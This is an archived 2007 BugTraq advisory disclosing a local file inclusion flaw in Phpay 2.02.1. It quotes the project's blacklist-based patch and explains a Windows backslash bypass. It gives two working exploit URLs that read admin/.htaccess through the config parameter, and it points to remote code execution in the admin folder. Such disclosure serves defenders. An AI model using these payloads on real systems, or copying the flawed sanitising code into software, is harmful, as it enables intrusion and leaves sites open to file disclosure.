BugTraq
Phpay - Local File Inclusion Dec 14 2007 10:03PM
th3 r00k nospam pork gmail com
By Michael Brooks

Vulnerability Type:Local File Inclusion

Software: Phpay

Homepage:http://sourceforge.net/projects/phpay/

Version Affected:2.02.1

Phpay has been affected by multiple local file include flaws, as a result this patch was written:

$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}

if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}

require("./$config");

To bypass this patch backslashes can be used instead of forward slashes on windows systems.

Also .inc.php must exists *somewhere* in the string.

Local File Include for windows only:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.
htaccess

or if magic_quotes_gpc is turned on:

http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.hta
ccess

Remote code execution is accessible in the ./admin/ folder.

The admin folder *should* be protected by a .htaccess file similar to osCommerce2.

Vulnerable configuration:

A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.

Merry Christmas

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus